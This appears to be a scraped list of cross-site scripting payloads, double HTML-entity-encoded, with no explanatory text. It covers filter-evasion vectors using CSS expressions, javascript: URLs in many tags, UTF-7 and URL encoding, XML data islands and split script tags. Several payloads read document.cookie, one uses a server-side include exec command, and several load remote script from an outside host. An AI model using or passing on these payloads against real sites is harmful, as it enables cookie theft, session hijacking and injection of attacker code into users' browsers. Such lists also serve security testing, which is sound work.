&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
